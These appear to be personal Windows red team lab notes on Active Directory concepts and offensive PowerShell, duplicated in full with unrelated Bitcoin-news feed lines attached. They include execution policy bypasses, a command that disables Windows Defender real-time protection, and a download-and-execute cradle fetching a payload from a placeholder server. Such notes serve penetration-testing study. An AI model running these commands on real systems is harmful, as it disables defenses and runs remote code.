Windows Red Team Lab notes (in progress)
Lesson 1 Basics:
Active Directory:
- Directory Service used to managed Windows networks
- stores information about objects on the network and makes it easily available to users and domains
- Active Directory enabled centralized, secure management of an entire network, which might span a building, a city or multiple locations
- Schema - defines objects and their attributes
- query and index mechanism - provides searching and publication of objects and their properties
- Global Catalog - contains information about every object in the directory
- Replication Service - distributes information across domain controllers
- Forest, domains and organizational unites (OUs) are the basic building blocks of any active directory structure.
- a forest is a security boundary - may contain multiple domains and each domain may contain multiple OUs.
PowerShell:
- provides access to almost everything in a Windows platform and AD environment which could be useful for an attacker
- provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes
- easy to learn and really powerful
- based on .NET framework and is tightly integrated with Windows
- PowerShell Core is platform independent
Open up Windows PowerShell ISE as an Administrator:
See file with powershell commands...
Cmdlets are used to perform an action and a .Net obkect is returned as the output
Cmdlets accept parameters for different operations
They have aliases.
These are NOT executables, you can write your own cmdlet with few lines of script.
Examples:
cd C:\
dir: //this works
dir.exe: //this does not
Important!
Use the below command for listing all cmdlets:
get-command -commandtype cmdlet
There are many interesting cmdlets from a pentester's perspective.
For example:
get-process
, list processes running on a system.
get-command -Name *process*
get-command -Verb set
It is a GUI Editor/Scripting Environment.
Tab Completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features.
Comes with a handy console pane to run commands from the ISE.
Execution Policy:
- this is NOT a security measure, but it is a prevention measure to prevent a user from accidently executing scripts
- several ways to bypass:
powershell -executionbypass bypass .\script.ps1
powershell -c <cmd>
powershell -enc
Turn off the Windows Defender:
Set-MpPreference -disablerealtimeMonitoring $true
.\Invoke-Encode.ps1
Get-ExecutionPolicy
powershell -ep bypass
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1
- Powershell also supports modules.
- A module can be imported with:
Import-module <path to module>
- all the commands in a module can be listed with:
Get-Command -Module <modulename>
Get-Command -module Get-ScheduledTask
Get-command -module
################
. c:\AD\Tools\Invoke-Encode.ps1
- the '.' in front of the path (Above) is called dot sourcing.
################
Whenever there is a command execution opportunity, PowerShell scripts can be executed using following methods:
- Download execute cradle
iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')
- Encodedcommand
>help powershell.exe //to find out powershell.exe available commands!
CheckOut Invoke-CradleCrafter:
https://ift.tt/2wzL4is
#####################
Lesson 2 Domain Enumeration:
from BITCOIN NEWS https://ift.tt/2ozc2mA
via Bitcoin News Update
from Bitcoin News Update https://ift.tt/2PuweRY
via IFTTT
Lesson 1 Basics:
Active Directory:
- Directory Service used to managed Windows networks
- stores information about objects on the network and makes it easily available to users and domains
- Active Directory enabled centralized, secure management of an entire network, which might span a building, a city or multiple locations
- Schema - defines objects and their attributes
- query and index mechanism - provides searching and publication of objects and their properties
- Global Catalog - contains information about every object in the directory
- Replication Service - distributes information across domain controllers
- Forest, domains and organizational unites (OUs) are the basic building blocks of any active directory structure.
- a forest is a security boundary - may contain multiple domains and each domain may contain multiple OUs.
PowerShell:
- provides access to almost everything in a Windows platform and AD environment which could be useful for an attacker
- provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes
- easy to learn and really powerful
- based on .NET framework and is tightly integrated with Windows
- PowerShell Core is platform independent
Open up Windows PowerShell ISE as an Administrator:
See file with powershell commands...
Cmdlets are used to perform an action and a .Net obkect is returned as the output
Cmdlets accept parameters for different operations
They have aliases.
These are NOT executables, you can write your own cmdlet with few lines of script.
Examples:
cd C:\
dir: //this works
dir.exe: //this does not
Important!
Use the below command for listing all cmdlets:
get-command -commandtype cmdlet
There are many interesting cmdlets from a pentester's perspective.
For example:
get-process
, list processes running on a system.
get-command -Name *process*
get-command -Verb set
It is a GUI Editor/Scripting Environment.
Tab Completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features.
Comes with a handy console pane to run commands from the ISE.
Execution Policy:
- this is NOT a security measure, but it is a prevention measure to prevent a user from accidently executing scripts
- several ways to bypass:
powershell -executionbypass bypass .\script.ps1
powershell -c <cmd>
powershell -enc
Turn off the Windows Defender:
Set-MpPreference -disablerealtimeMonitoring $true
.\Invoke-Encode.ps1
Get-ExecutionPolicy
powershell -ep bypass
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1
- Powershell also supports modules.
- A module can be imported with:
Import-module <path to module>
- all the commands in a module can be listed with:
Get-Command -Module <modulename>
Get-Command -module Get-ScheduledTask
Get-command -module
################
. c:\AD\Tools\Invoke-Encode.ps1
- the '.' in front of the path (Above) is called dot sourcing.
################
Whenever there is a command execution opportunity, PowerShell scripts can be executed using following methods:
- Download execute cradle
iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')
- Encodedcommand
>help powershell.exe //to find out powershell.exe available commands!
CheckOut Invoke-CradleCrafter:
https://ift.tt/2wzL4is
#####################
Lesson 2 Domain Enumeration:
from BITCOIN NEWS https://ift.tt/2ozc2mA
via Bitcoin News Update
from Bitcoin News Update https://ift.tt/2PuweRY
via IFTTT
